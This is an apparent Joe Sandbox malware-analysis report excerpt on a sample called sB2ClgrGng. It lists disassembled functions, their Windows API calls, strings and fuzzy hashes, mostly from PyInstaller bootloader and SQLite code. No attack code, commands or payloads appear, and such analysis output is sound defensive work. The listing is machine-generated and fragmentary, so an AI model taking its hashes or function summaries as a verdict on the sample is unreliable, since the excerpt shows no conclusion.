Associated: 00000001.00000002.2194471815.00007FF644870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2194573290.00007FF64489B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2194629316.00007FF6448AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2194629316.00007FF6448B1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2194725586.00007FF6448B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff644870000_sB2ClgrGng.jbxd

Similarity

API ID: CurrentProcess
String ID: 0$WARNING$Warning$Warning [ANSI Fallback]$[PYI-%d:%s]
API String ID: 2050909247-2900015858
Opcode ID: d3ff72078d09a899d0ca032b5bdbc8691629937d026b54217f09319e947088a3
Instruction ID: 48c668cb77eb8570dffbbe990ad76f74f03ae4f8b597ce6cd77e2415a8efa627
Opcode Fuzzy Hash: d3ff72078d09a899d0ca032b5bdbc8691629937d026b54217f09319e947088a3
Instruction Fuzzy Hash: 38216D22B1DB8186E720BB51B8927E6A294BB88784F400136EE8D93A5DDF7CD2458740

Function 00007FF644878570 Relevance: 10.6, APIs: 7, Instructions: 63COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32 ref: 00007FF644878590
OpenProcessToken.ADVAPI32 ref: 00007FF6448785A3
GetTokenInformation.ADVAPI32 ref: 00007FF6448785C8
GetLastError.KERNEL32 ref: 00007FF6448785D2
GetTokenInformation.ADVAPI32 ref: 00007FF644878612
ConvertSidToStringSidW.ADVAPI32 ref: 00007FF64487862E
CloseHandle.KERNEL32 ref: 00007FF644878646

Memory Dump Source

Source File: 00000001.00000002.2194518215.00007FF644871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF644870000, based on PE: true

Associated: 00000001.00000002.2194471815.00007FF644870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2194573290.00007FF64489B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2194629316.00007FF6448AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2194629316.00007FF6448B1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2194725586.00007FF6448B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff644870000_sB2ClgrGng.jbxd

Similarity

API ID: Token$InformationProcess$CloseConvertCurrentErrorHandleLastOpenString
String ID:
API String ID: 995526605-0
Opcode ID: f75ab0f0843ea553283f31270fa2e47dd05c34398218a1d4d57149fb78d89f01
Instruction ID: 8ff23daac34e28f961cb8ae23d9edeb7e9f529dbe03ddca6641a9341b4c75295
Opcode Fuzzy Hash: f75ab0f0843ea553283f31270fa2e47dd05c34398218a1d4d57149fb78d89f01
Instruction Fuzzy Hash: 19215131B0CA4696EA10BB55B9D622AA3A0FFC57A0F500635EE6D83AECDE7DD4458700

Function 00007FF64488B150 Relevance: 10.6, APIs: 7, Instructions: 62COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 00007FF64488B15F
FlsGetValue.KERNEL32 ref: 00007FF64488B174
FlsSetValue.KERNEL32 ref: 00007FF64488B195
FlsSetValue.KERNEL32 ref: 00007FF64488B1C2
FlsSetValue.KERNEL32 ref: 00007FF64488B1D3
FlsSetValue.KERNEL32 ref: 00007FF64488B1E4
SetLastError.KERNEL32 ref: 00007FF64488B1FF

Memory Dump Source

Source File: 00000001.00000002.2194518215.00007FF644871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF644870000, based on PE: true

Associated: 00000001.00000002.2194471815.00007FF644870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2194573290.00007FF64489B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2194629316.00007FF6448AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2194629316.00007FF6448B1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2194725586.00007FF6448B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff644870000_sB2ClgrGng.jbxd

Similarity

API ID: Value$ErrorLast
String ID:
API String ID: 2506987500-0
Opcode ID: bd40692f84e3da01acd5c9e715af8932c2ff4b5b564443a413d720313231dc09
Instruction ID: a068081b1ad647b364f6ad8202f0667a0feb1ebce3b1417bd714d0b92f124744
Opcode Fuzzy Hash: bd40692f84e3da01acd5c9e715af8932c2ff4b5b564443a413d720313231dc09
Instruction Fuzzy Hash: AC212F24B0D6428DF969B3619AD713961525FC4BB0F144634EE3EDAADEDE2CF4408301

Function 00007FF644897D6C Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON

Download Yara Rule

APIs

WriteConsoleW.KERNEL32 ref: 00007FF644897D9D
GetLastError.KERNEL32 ref: 00007FF644897DA9
CloseHandle.KERNEL32 ref: 00007FF644897DC1
CreateFileW.KERNEL32 ref: 00007FF644897DEC
WriteConsoleW.KERNEL32 ref: 00007FF644897E0B

Strings

CONOUT$, xrefs: 00007FF644897DCD

Memory Dump Source

Source File: 00000001.00000002.2194518215.00007FF644871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF644870000, based on PE: true

Associated: 00000001.00000002.2194471815.00007FF644870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2194573290.00007FF64489B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2194629316.00007FF6448AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2194629316.00007FF6448B1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2194725586.00007FF6448B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff644870000_sB2ClgrGng.jbxd

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
String ID: CONOUT$
API String ID: 3230265001-3130406586
Opcode ID: 3755c2f75cb97972cd4ab37a7e27d28fd0bf6f95a56d27d10542fc75f089f0eb
Instruction ID: 828454efcfa034140589112358b03fffd4cc8a91845e4d36557791bea7db6807
Opcode Fuzzy Hash: 3755c2f75cb97972cd4ab37a7e27d28fd0bf6f95a56d27d10542fc75f089f0eb
Instruction Fuzzy Hash: DB114C21B1CE41CAE750BB52A896329A6A0FB88FE4F044634EE5DC77A8DF7DD854C740

Function 00007FFDFAF6EF40 Relevance: 9.1, APIs: 1, Strings: 4, Instructions: 390COMMON

Download Yara Rule

APIs

00007FFE148D2010.VCRUNTIME140 ref: 00007FFDFAF6EFE6

Strings

vtable constructor did not declare schema: %s, xrefs: 00007FFDFAF6F298
vtable constructor called recursively: %s, xrefs: 00007FFDFAF6F112
vtable constructor failed: %s, xrefs: 00007FFDFAF6F159
hidden, xrefs: 00007FFDFAF6F3DD

Memory Dump Source

Source File: 00000001.00000002.2196754681.00007FFDFAED1000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FFDFAED0000, based on PE: true

Associated: 00000001.00000002.2196705748.00007FFDFAED0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2196754681.00007FFDFB032000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2196754681.00007FFDFB034000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2196754681.00007FFDFB049000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2197064707.00007FFDFB04B000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2197118312.00007FFDFB04C000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffdfaed0000_sB2ClgrGng.jbxd

Similarity

API ID: 00007D2010E148
String ID: hidden$vtable constructor called recursively: %s$vtable constructor did not declare schema: %s$vtable constructor failed: %s
API String ID: 1405196051-1299490920
Opcode ID: bcd0000a8b0658819eb2787e599c4801e1d8db1979c67284f587446422cc76e8
Instruction ID: f4c616c3e65b988847cc5cf63e493310bd78a8e2fab3284cb33e9afac18f2f44
Opcode Fuzzy Hash: bcd0000a8b0658819eb2787e599c4801e1d8db1979c67284f587446422cc76e8
Instruction Fuzzy Hash: 1F02BD62B09B8682EB289B11D560B7A77A1FF85BA4F044271EE6E0B7D9DF3CD441C710

Function 00007FF644878ED0 Relevance: 9.1, APIs: 6, Instructions: 121COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(?,FFFFFFFF,00000000,00007FF644873FA9), ref: 00007FF644878EFD
K32EnumProcessModules.KERNEL32(?,FFFFFFFF,00000000,00007FF644873FA9), ref: 00007FF644878F5A

Part of subcall function 00007FF644879390: MultiByteToWideChar.KERNEL32(?,?,?,00007FF6448745F4,00000000,00007FF644871985), ref: 00007FF6448793C9

K32GetModuleFileNameExW.KERNEL32(?,FFFFFFFF,00000000,00007FF644873FA9), ref: 00007FF644878FE5
K32GetModuleFileNameExW.KERNEL32(?,FFFFFFFF,00000000,00007FF644873FA9), ref: 00007FF644879044
FreeLibrary.KERNEL32(?,FFFFFFFF,00000000,00007FF644873FA9), ref: 00007FF644879055
FreeLibrary.KERNEL32(?,FFFFFFFF,00000000,00007FF644873FA9), ref: 00007FF64487906A

Memory Dump Source

Source File: 00000001.00000002.2194518215.00007FF644871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF644870000, based on PE: true

Associated: 00000001.00000002.2194471815.00007FF644870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2194573290.00007FF64489B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2194629316.00007FF6448AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2194629316.00007FF6448B1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2194725586.00007FF6448B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff644870000_sB2ClgrGng.jbxd

Similarity

API ID: FileFreeLibraryModuleNameProcess$ByteCharCurrentEnumModulesMultiWide
String ID:
API String ID: 3462794448-0
Opcode ID: b9812aa4a412ff6f242132f81c88a7c8c76a4ef9029947ab8fd2a45bc25d6007
Instruction ID: ea800eb5fccd425ef51aff986e17c76569fcd7bf882b6aca6ee07065e78cff51
Opcode Fuzzy Hash: b9812aa4a412ff6f242132f81c88a7c8c76a4ef9029947ab8fd2a45bc25d6007
Instruction Fuzzy Hash: F0419362B1D68289FA30BB12A9922BA73A4FB95BD4F450135DF4D9778DDE3CE500C700

Function 00007FFDFAEFBFE0 Relevance: 9.1, APIs: 2, Strings: 3, Instructions: 366COMMON

Download Yara Rule

APIs

00007FFE148D2010.VCRUNTIME140 ref: 00007FFDFAEFC12D
00007FFE148D2010.VCRUNTIME140 ref: 00007FFDFAEFC287

Strings

%s at line %d of [%.10s], xrefs: 00007FFDFAEFC0EC, 00007FFDFAEFC233
8653b758870e6ef0c98d46b3ace27849054af85da891eb121e9aaa537f1e8355, xrefs: 00007FFDFAEFC0D3, 00007FFDFAEFC21A
database corruption, xrefs: 00007FFDFAEFC0E0, 00007FFDFAEFC227

Memory Dump Source

Source File: 00000001.00000002.2196754681.00007FFDFAED1000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FFDFAED0000, based on PE: true

Associated: 00000001.00000002.2196705748.00007FFDFAED0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2196754681.00007FFDFB032000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2196754681.00007FFDFB034000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2196754681.00007FFDFB049000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2197064707.00007FFDFB04B000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2197118312.00007FFDFB04C000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffdfaed0000_sB2ClgrGng.jbxd

Similarity

API ID: 00007D2010E148
String ID: %s at line %d of [%.10s]$8653b758870e6ef0c98d46b3ace27849054af85da891eb121e9aaa537f1e8355$database corruption
API String ID: 1405196051-3727861699
Opcode ID: c69df26a08142c3bac296afa14bbc48bbb1f6b7d590379f647cd0c614d1fc777
Instruction ID: 377aedb6a864d708aff0311608897adf65b4ceedbda975d9d08c6b04aa2155cc
Opcode Fuzzy Hash: c69df26a08142c3bac296afa14bbc48bbb1f6b7d590379f647cd0c614d1fc777
Instruction Fuzzy Hash: 8DF19C72708BC186DB94AB59E464BAD77A0FB85B94F108036EE9E43799DF3AD844C700

Function 00007FFDFAF36750 Relevance: 9.1, APIs: 2, Strings: 3, Instructions: 338COMMON

Download Yara Rule

APIs

00007FFE148D2010.VCRUNTIME140 ref: 00007FFDFAF368E2
00007FFE148D2010.VCRUNTIME140 ref: 00007FFDFAF36B6E

Strings

unknown column "%s" in foreign key definition, xrefs: 00007FFDFAF36AFE
foreign key on %s should reference only one column of table %T, xrefs: 00007FFDFAF367D5
number of columns in foreign key does not match the number of columns in the referenced table, xrefs: 00007FFDFAF367FE

Memory Dump Source

Source File: 00000001.00000002.2196754681.00007FFDFAED1000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FFDFAED0000, based on PE: true

Associated: 00000001.00000002.2196705748.00007FFDFAED0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2196754681.00007FFDFB032000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2196754681.00007FFDFB034000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2196754681.00007FFDFB049000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2197064707.00007FFDFB04B000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2197118312.00007FFDFB04C000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffdfaed0000_sB2ClgrGng.jbxd

Similarity

API ID: 00007D2010E148
String ID: foreign key on %s should reference only one column of table %T$number of columns in foreign key does not match the number of columns in the referenced table$unknown column "%s" in foreign key definition
API String ID: 1405196051-272990098
Opcode ID: 6fff13bf3b6b7fc501f9dd484fdf476247ce254bc16ef6a032cff1d218471b39
Instruction ID: 7fa7a4054e866c71df7f768e0db4448e54660e9632581fbb5abf32e17a0b65a8
Opcode Fuzzy Hash: 6fff13bf3b6b7fc501f9dd484fdf476247ce254bc16ef6a032cff1d218471b39
Instruction Fuzzy Hash: 7AD1C562B0978182FBA88B159464A7A7B91FF45BE4F4442B5EE6E0B7D9DF3CD481C300

Function 00007FFDFAEF55B0 Relevance: 9.1, APIs: 2, Strings: 3, Instructions: 314COMMON

Download Yara Rule

APIs

00007FFE148D2010.VCRUNTIME140 ref: 00007FFDFAEF5965
00007FFE148D2010.VCRUNTIME140 ref: 00007FFDFAEF597A

Strings

%s at line %d of [%.10s], xrefs: 00007FFDFAEF560D
8653b758870e6ef0c98d46b3ace27849054af85da891eb121e9aaa537f1e8355, xrefs: 00007FFDFAEF55F5
database corruption, xrefs: 00007FFDFAEF5601

Memory Dump Source

Source File: 00000001.00000002.2196754681.00007FFDFAED1000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FFDFAED0000, based on PE: true

Associated: 00000001.00000002.2196705748.00007FFDFAED0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2196754681.00007FFDFB032000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2196754681.00007FFDFB034000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2196754681.00007FFDFB049000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2197064707.00007FFDFB04B000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2197118312.00007FFDFB04C000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffdfaed0000_sB2ClgrGng.jbxd

Similarity

API ID: 00007D2010E148
String ID: %s at line %d of [%.10s]$8653b758870e6ef0c98d46b3ace27849054af85da891eb121e9aaa537f1e8355$database corruption
API String ID: 1405196051-3727861699
Opcode ID: 3fa76793ff51000907a4173b9cd8982be06d5e4031eb3370abfe8fd6ce14fdfa
Instruction ID: 3041dc56fab54e55dbfe292e806b72869e4775ec8936e2afb1e76748578e4d62
Opcode Fuzzy Hash: 3fa76793ff51000907a4173b9cd8982be06d5e4031eb3370abfe8fd6ce14fdfa
Instruction Fuzzy Hash: E2D1D132B08BC586DB68DF19E054B69B7A8FB94B84F554032DE6E47798EF3AD801C710

Function 00007FF6448790E0 Relevance: 9.1, APIs: 2, Strings: 4, Instructions: 64COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF644878570: GetCurrentProcess.KERNEL32 ref: 00007FF644878590
Part of subcall function 00007FF644878570: OpenProcessToken.ADVAPI32 ref: 00007FF6448785A3
Part of subcall function 00007FF644878570: GetTokenInformation.ADVAPI32 ref: 00007FF6448785C8
Part of subcall function 00007FF644878570: GetLastError.KERNEL32 ref: 00007FF6448785D2
Part of subcall function 00007FF644878570: GetTokenInformation.ADVAPI32 ref: 00007FF644878612
Part of subcall function 00007FF644878570: ConvertSidToStringSidW.ADVAPI32 ref: 00007FF64487862E
Part of subcall function 00007FF644878570: CloseHandle.KERNEL32 ref: 00007FF644878646

LocalFree.KERNEL32(?,00007FF644873C55), ref: 00007FF64487916C
LocalFree.KERNEL32(?,00007FF644873C55), ref: 00007FF644879175

Strings

Security descriptor string length exceeds PYI_PATH_MAX!, xrefs: 00007FF644879183
S-1-3-4, xrefs: 00007FF644879121
D:(A;;FA;;;%s)(A;;FA;;;%s), xrefs: 00007FF644879142
D:(A;;FA;;;%s), xrefs: 00007FF644879157

Memory Dump Source

Source File: 00000001.00000002.2194518215.00007FF644871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF644870000, based on PE: true

Associated: 00000001.00000002.2194471815.00007FF644870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2194573290.00007FF64489B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2194629316.00007FF6448AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2194629316.00007FF6448B1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2194725586.00007FF6448B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff644870000_sB2ClgrGng.jbxd

Similarity

API ID: Token$FreeInformationLocalProcess$CloseConvertCurrentErrorHandleLastOpenString
String ID: D:(A;;FA;;;%s)$D:(A;;FA;;;%s)(A;;FA;;;%s)$S-1-3-4$Security descriptor string length exceeds PYI_PATH_MAX!
API String ID: 6828938-1529539262
Opcode ID: 0222097b9c90264a1a2c87a2a2fde68e1a94831f5278aced0db9eca26447961c
Instruction ID: bce3d37799d3d9e335fbfa39cce7c57ba69659e3440c3ac35b5d8b626efc252f
Opcode Fuzzy Hash: 0222097b9c90264a1a2c87a2a2fde68e1a94831f5278aced0db9eca26447961c
Instruction Fuzzy Hash: AF215E21B0CB4289F610BB10E9A62EA62A5FF88780F444035EE4D83B9EDF3DD845C750

Function 00007FF64488B2C8 Relevance: 9.1, APIs: 6, Instructions: 57COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,00007FF644884F11,?,?,?,?,00007FF64488A48A,?,?,?,?,00007FF64488718F), ref: 00007FF64488B2D7
FlsSetValue.KERNEL32(?,?,?,00007FF644884F11,?,?,?,?,00007FF64488A48A,?,?,?,?,00007FF64488718F), ref: 00007FF64488B30D
FlsSetValue.KERNEL32(?,?,?,00007FF644884F11,?,?,?,?,00007FF64488A48A,?,?,?,?,00007FF64488718F), ref: 00007FF64488B33A
FlsSetValue.KERNEL32(?,?,?,00007FF644884F11,?,?,?,?,00007FF64488A48A,?,?,?,?,00007FF64488718F), ref: 00007FF64488B34B
FlsSetValue.KERNEL32(?,?,?,00007FF644884F11,?,?,?,?,00007FF64488A48A,?,?,?,?,00007FF64488718F), ref: 00007FF64488B35C
SetLastError.KERNEL32(?,?,?,00007FF644884F11,?,?,?,?,00007FF64488A48A,?,?,?,?,00007FF64488718F), ref: 00007FF64488B377

Memory Dump Source

Source File: 00000001.00000002.2194518215.00007FF644871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF644870000, based on PE: true

Associated: 00000001.00000002.2194471815.00007FF644870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2194573290.00007FF64489B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2194629316.00007FF6448AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2194629316.00007FF6448B1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2194725586.00007FF6448B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff644870000_sB2ClgrGng.jbxd

Similarity

API ID: Value$ErrorLast
String ID:
API String ID: 2506987500-0
Opcode ID: 511c86220214880ca4b01c77dd55d0a7de68e458561f726588d357ec3f22002e
Instruction ID: 684177b36193b1b24bf5b413935c2ba1f59ef53dd8a831283c63d5280a02d0e5
Opcode Fuzzy Hash: 511c86220214880ca4b01c77dd55d0a7de68e458561f726588d357ec3f22002e
Instruction Fuzzy Hash: 59113830B4C6428AFA59B7659AD713D62829FC4BB0F044634EE2ED6ADEDE2CF4018301

Function 00007FFDFAF28CE0 Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 298COMMON

Download Yara Rule

APIs

00007FFE148D2010.VCRUNTIME140 ref: 00007FFDFAF28EED
00007FFE148D2010.VCRUNTIME140 ref: 00007FFDFAF28FC9
00007FFE148D2010.VCRUNTIME140 ref: 00007FFDFAF290CB

Strings

%Q%s, xrefs: 00007FFDFAF29034
"%w" , xrefs: 00007FFDFAF28D8B

Memory Dump Source

Source File: 00000001.00000002.2196754681.00007FFDFAED1000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FFDFAED0000, based on PE: true

Associated: 00000001.00000002.2196705748.00007FFDFAED0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2196754681.00007FFDFB032000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2196754681.00007FFDFB034000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2196754681.00007FFDFB049000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2197064707.00007FFDFB04B000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2197118312.00007FFDFB04C000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffdfaed0000_sB2ClgrGng.jbxd

Similarity

API ID: 00007D2010E148
String ID: "%w" $%Q%s
API String ID: 1405196051-1987291987
Opcode ID: 907d55e51c7058cb158fe87907fe270dc46d94b6a55033e43f7ec2f1ab85e8f8
Instruction ID: 4b22ff078bd96c74a32b0ea7f5d5faa8b45bed7db56762d5cd1ed121eabfaf60
Opcode Fuzzy Hash: 907d55e51c7058cb158fe87907fe270dc46d94b6a55033e43f7ec2f1ab85e8f8
Instruction Fuzzy Hash: 8BC1C425B19A8286EB18CB5594A0A7967E0FF55BA0F444775EE7E0B7E9CF3CE4408340

Function 00007FFDFAEF0FF0 Relevance: 9.0, APIs: 2, Strings: 3, Instructions: 253COMMON

Download Yara Rule

APIs

00007FFE148D2010.VCRUNTIME140 ref: 00007FFDFAEF12C7
00007FFE148D2010.VCRUNTIME140 ref: 00007FFDFAEF1335

Strings

%s at line %d of [%.10s], xrefs: 00007FFDFAEF108A
8653b758870e6ef0c98d46b3ace27849054af85da891eb121e9aaa537f1e8355, xrefs: 00007FFDFAEF1072
database corruption, xrefs: 00007FFDFAEF107E

Memory Dump Source

Source File: 00000001.00000002.2196754681.00007FFDFAED1000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FFDFAED0000, based on PE: true

Associated: 00000001.00000002.2196705748.00007FFDFAED0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2196754681.00007FFDFB032000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2196754681.00007FFDFB034000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2196754681.00007FFDFB049000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2197064707.00007FFDFB04B000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2197118312.00007FFDFB04C000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffdfaed0000_sB2ClgrGng.jbxd

Similarity

API ID: 00007D2010E148
String ID: %s at line %d of [%.10s]$8653b758870e6ef0c98d46b3ace27849054af85da891eb121e9aaa537f1e8355$database corruption
API String ID: 1405196051-3727861699
Opcode ID: a288532d659f958d16e14da1c3b3fb0a3d980919a3d3362a77c99815c8e34165
Instruction ID: b6ada68d219ed7f10d5419822a3f0bdadd8250b209ddd5f54bd01fc0fc31267b
Opcode Fuzzy Hash: a288532d659f958d16e14da1c3b3fb0a3d980919a3d3362a77c99815c8e34165
Instruction Fuzzy Hash: 5CB11272B0D2D685D7289B189460ABE7B91FB81780F054275DB9A877C9DF3EE044D700

Function 00007FFDFAF27D70 Relevance: 9.0, APIs: 2, Strings: 3, Instructions: 215COMMON

Download Yara Rule

APIs

00007FFE148D2010.VCRUNTIME140 ref: 00007FFDFAF27F7E
00007FFE148D2010.VCRUNTIME140 ref: 00007FFDFAF27FE9

Strings

Cannot add a column to a view, xrefs: 00007FFDFAF27E24
virtual tables may not be altered, xrefs: 00007FFDFAF27E08
sqlite_altertab_%s, xrefs: 00007FFDFAF27F3D

Memory Dump Source

Source File: 00000001.00000002.2196754681.00007FFDFAED1000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FFDFAED0000, based on PE: true

Associated: 00000001.00000002.2196705748.00007FFDFAED0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2196754681.00007FFDFB032000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2196754681.00007FFDFB034000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2196754681.00007FFDFB049000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2197064707.00007FFDFB04B000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2197118312.00007FFDFB04C000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffdfaed0000_sB2ClgrGng.jbxd

Similarity

API ID: 00007D2010E148
String ID: Cannot add a column to a view$sqlite_altertab_%s$virtual tables may not be altered
API String ID: 1405196051-2063813899
Opcode ID: 04c7ac160417419a773f1a03789a70658ed0dc70c10830113a31aabe6f2124d7
Instruction ID: 5fd9674dc7207cc78d5fff917e59d88da0ce22782ebb850bb64caeb52817c09a
Opcode Fuzzy Hash: 04c7ac160417419a773f1a03789a70658ed0dc70c10830113a31aabe6f2124d7
Instruction Fuzzy Hash: 3C91E262B19B8182EB54CF11A424AB977E1FF89B90F454275EEAD4B799EF3CE441C300

Function 00007FFDFAEF8670 Relevance: 9.0, APIs: 2, Strings: 3, Instructions: 211COMMON

Download Yara Rule

APIs

00007FFE148D2010.VCRUNTIME140 ref: 00007FFDFAEF882C
00007FFE148D2010.VCRUNTIME140 ref: 00007FFDFAEF8931

Strings

%s at line %d of [%.10s], xrefs: 00007FFDFAEF8726
8653b758870e6ef0c98d46b3ace27849054af85da891eb121e9aaa537f1e8355, xrefs: 00007FFDFAEF870C
database corruption, xrefs: 00007FFDFAEF871F

Memory Dump Source

Source File: 00000001.00000002.2196754681.00007FFDFAED1000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FFDFAED0000, based on PE: true

Associated: 00000001.00000002.2196705748.00007FFDFAED0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2196754681.00007FFDFB032000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2196754681.00007FFDFB034000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2196754681.00007FFDFB049000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2197064707.00007FFDFB04B000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2197118312.00007FFDFB04C000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffdfaed0000_sB2ClgrGng.jbxd

Similarity

API ID: 00007D2010E148
